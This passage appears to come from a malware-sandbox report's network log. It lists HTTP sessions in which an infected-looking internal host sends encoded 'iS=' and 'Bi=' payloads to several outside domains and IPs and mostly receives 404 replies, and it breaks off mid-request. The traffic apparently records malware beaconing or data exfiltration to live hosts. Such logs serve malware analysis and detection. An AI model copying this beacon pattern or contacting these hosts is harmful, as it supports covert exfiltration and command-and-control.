                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              76192.168.11.2049850101.35.209.18380
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:01.125547886 CET2578OUTPOST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 77 65 34 30 32 6f 39 6d 30 38 6f 63 65 58 4a 6b 68 2b 72 6d 5a 65 56 50 2f 43 71 53 35 6b 34 31 6f 42 32 78 76 58 6c 42 6c 47 77 4d 2f 38 65 48 56 79 74 49 75 5a 59 69 74 33 47 44 35 6d 37 38 44 48 6c 62 48 74 62 4b 62 48 74 59 34 75 43 41 32 39 73 45 49 32 61 54 62 38 4f 6f 6c 78 6e 72 43 6e 36 48 6c 46 6a 55 75 68 6c 4a 4f 62 6f 73 49 37 78 47 2b 74 71 65 38 4a 33 77 4c 68 61 73 57 73 6e 70 52 4f 2b 6f 66 4c 51 78 43 42 7a 46 4c 4f 4d 79 48 4b 7a 39 6b 33 63 33 59 54 61 63 4a 38 53 53 4f 6e [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVwe402o9m08oceXJkh+rmZeVP/CqS5k41oB2xvXlBlGwM/8eHVytIuZYit3GD5m78DHlbHtbKbHtY4uCA29sEI2aTb8OolxnrCn6HlFjUuhlJObosI7xG+tqe8J3wLhasWsnpRO+ofLQxCBzFLOMyHKz9k3c3YTacJ8SSOn8LVNDCj9QnVAPQCu3vKGrIloMv63OMz2j2LHy7EJdRitDHxDyU+YR/nGn+g0iPMaJsGdaLXBE5ngtrEzXBTGqk6S+l2okZyUyGdZOijBbkmWA9I60T9rkDsvCba5j2SQSfTgyq/bwQsPMum1uGoCopeE5AZecxb8MoMWVge6syIYX9gy69xXJ/FeANLtyD9ugVCOZGgzhOWzVKjMK/5scA5ipxL7qCJj/ErowVIEHbYpFKFkk0PB4R3lAIDkfg0qqaeMaWl6mdXymtxjkaYOaQaD1Cm9lzLFf/ws8lhC949uQFl55VfhyhIcwmCFnF5txNVMUbWJZ4n/HBAD1tiZkbThMhw8qlMNB6gpwnfJBocoxUz3JXWl1T+58IQkKuPvMvzojvjsxYNokF6GpYC9MqiZFud9qqV74WUTSOrcOmcNOQQOE1xYcVlcHJLtOI6a69S5pDVMA98/sPl32OK4PpthTVjsQ4AID0k8/+Z+Exm6aUxJRES+RN5fmaPxvW5Pq3pmrUxE9++I/4gMvJcD9Vgd+DEVGq7InWEQuXZdSxPFcSUlUQzSIa4wJZxkKadRuDLjfGvabPn9dHqHN2b9rqh1DHByiypOZed8yjq4qOMrO9nJw0UJEZJdkz/uRRjMusclmk2Hl9yf2GO5Od/N+lo0rdfN1/Ehye [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 04:02:01.125627041 CET5349OUTData Raw: 68 78 35 6c 64 76 54 6a 6a 63 39 37 6a 64 72 67 71 4e 69 2f 31 69 72 55 72 36 63 32 7a 41 77 35 38 43 37 77 4a 64 63 79 6e 6b 37 34 75 2b 6b 4b 48 2f 69 47 4a 43 69 6b 2f 53 70 56 58 71 53 31 44 4a 78 67 34 62 67 62 72 38 39 69 5a 39 58 76 63 33
                                                                                                                                                                              Data Ascii: hx5ldvTjjc97jdrgqNi/1irUr6c2zAw58C7wJdcynk74u+kKH/iGJCik/SpVXqS1DJxg4bgbr89iZ9Xvc3q1SJo6MTvNgsk76IauEVFKvA3MJCwg6CIDrj28tbryfEVpZBgNR27NAm4msjX7t5C6yOJ2XTuCSmPMsSV8uVeiPplI2chkwBCgQNRv0TT6FU7YJz8JTQn2/yimQhfa01/uH5Ledl7PuQbyNNEPqXOiwqUykc432zD
                                                                                                                                                                              Jan 11, 2025 04:02:01.447990894 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:01 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              77192.168.11.2049851101.35.209.18380
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:03.968141079 CET488OUTGET /31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 04:02:04.288980007 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:04 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              78192.168.11.2049852154.23.178.23180
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:09.600085020 CET746OUTPOST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 37 4b 71 44 44 76 4a 4e 57 30 38 42 30 6a 64 38 4c 4f 5a 6d 30 6b 41 7a 47 38 77 37 4d 4f 6b 6f 31 67 3d 3d
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
                                                                                                                                                                              Jan 11, 2025 04:02:09.905251980 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:09 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              79192.168.11.2049853154.23.178.23180
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:12.425354958 CET766OUTPOST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 63 42 43 4d 4a 54 4f 4d 6c 7a 6f 6c 36 66 4e 36 50 6c 75 32 53 46 49 49 38 75 47 56 6a 6f 39 58 63 3d
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
                                                                                                                                                                              Jan 11, 2025 04:02:12.730467081 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:12 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              80192.168.11.2049854154.23.178.23180
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:15.255738974 CET6445OUTPOST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 49 4e 70 69 4e 4b 47 34 6f 55 6b 6b 59 57 4b 34 4a 32 4d 2b 6b 69 6c 55 79 51 44 4a 62 52 78 51 53 44 4c 4b 67 30 66 47 72 35 6f 44 6b 71 66 62 2f 43 4a 4f 5a 42 64 46 50 43 42 6f 59 61 62 43 53 31 79 6d 54 7a 64 72 37 55 6e 76 6c 59 64 35 59 52 78 54 4d 77 65 79 7a 67 45 46 72 70 50 45 63 52 43 34 61 5a 63 2f 4a 54 46 56 72 37 58 7a 75 39 43 6f 68 2f 54 42 2f 30 4d 36 51 43 6f 2b 30 54 32 39 4d 63 79 67 39 39 79 64 55 6e 6b 77 30 55 52 65 58 34 59 41 71 58 2b 56 41 6a 6d 6c 43 6c 63 2b 2b [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYUINpiNKG4oUkkYWK4J2M+kilUyQDJbRxQSDLKg0fGr5oDkqfb/CJOZBdFPCBoYabCS1ymTzdr7UnvlYd5YRxTMweyzgEFrpPEcRC4aZc/JTFVr7Xzu9Coh/TB/0M6QCo+0T29Mcyg99ydUnkw0UReX4YAqX+VAjmlClc++PEIkOW62PVndItNl5W06rreFycQ77gdJJxibRRqR1kHcrNo2itPCbnvTOhkE+qrZcYEFvO9rF0YibJ4EKsbb76L8ZIxDeZWokM5Ct3OLpAKovb3AXZzTwzgnhIA00HGwqTE+SWYHocGezh/2YH2n+O/Q9BuJeTF+RzbmHq5EAlD+M1VB3yC3IfwT0x4kjpXQktFwj5G9QhXDgcNEt6XuSaeC/FvZgHk7AGwmyW03ayf5qStkjRtXKqPApYlQTYTSERl/l8xfjOBrHJODInzXHnPZDAzi7V3jWFCugMRY32EpWDAPT98VU1dstyja03UETmtfjgrpBSx6Z4KgKEeWjiNgnrQNu44Txucal2kt1QDDu6P1DfQrHkBGlX3Un/i+nwfpsvtYKw8K51kQUlbsKHygsLVdJ0z7wRwGinyasKWBLFQKnSIMb4vnXSg/Ze7BV0zrmeRvsduaJfE8pwyFLMX9R3BOai9EdJDMxm0cKOAspUbFSFUhF+E+3weloXh1PHFFpFdg3QM5yChRLYLbDJeUfe9NOVbuT8/8BzIAzY8a6gK6UPzKCU258ZNwglQT4CCAW8t+G6tRueUFS73KYKZeelwaTP4i0CRMh2riEr7Msc3eqszoKndWqHuzgv7Yz/CMnVWEi/Q+Gc9/q8zf8NRlkWMuCUEmhg [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 04:02:15.255806923 CET1470OUTData Raw: 50 64 43 2f 38 52 58 33 77 76 42 37 72 49 37 76 66 47 56 4c 6c 78 75 50 75 4a 6b 31 62 33 4a 47 37 6a 50 64 31 37 4b 2f 4e 52 7a 4e 65 74 79 69 30 55 65 6a 47 5a 4d 61 2f 46 67 4f 38 5a 69 4f 36 52 53 64 2b 48 74 68 62 6f 41 32 6d 67 47 33 4f 68
                                                                                                                                                                              Data Ascii: PdC/8RX3wvB7rI7vfGVLlxuPuJk1b3JG7jPd17K/NRzNetyi0UejGZMa/FgO8ZiO6RSd+HthboA2mgG3Oh/8oe+F6BojwvxDwqunJZi2KyBuskhhHQGNuLvqRmFgAp32awM4bkPllPMusD1Y3DpDPH2wuZAMnIqaYgTYj1JrBpGa2dnZGYV/3t9nIh/77MBPE3+cAUgErm3bBe6Lvdr/gk/iD4w8Uf4dGuH6r7zj4oa1HpVZtiS
                                                                                                                                                                              Jan 11, 2025 04:02:15.561505079 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:15 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              81192.168.11.2049855154.23.178.23180
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:18.075582981 CET484OUTGET /p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 04:02:18.380424023 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:18 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              82192.168.11.2049856208.91.197.3980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:02:23.536418915 CET746OUTPOST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
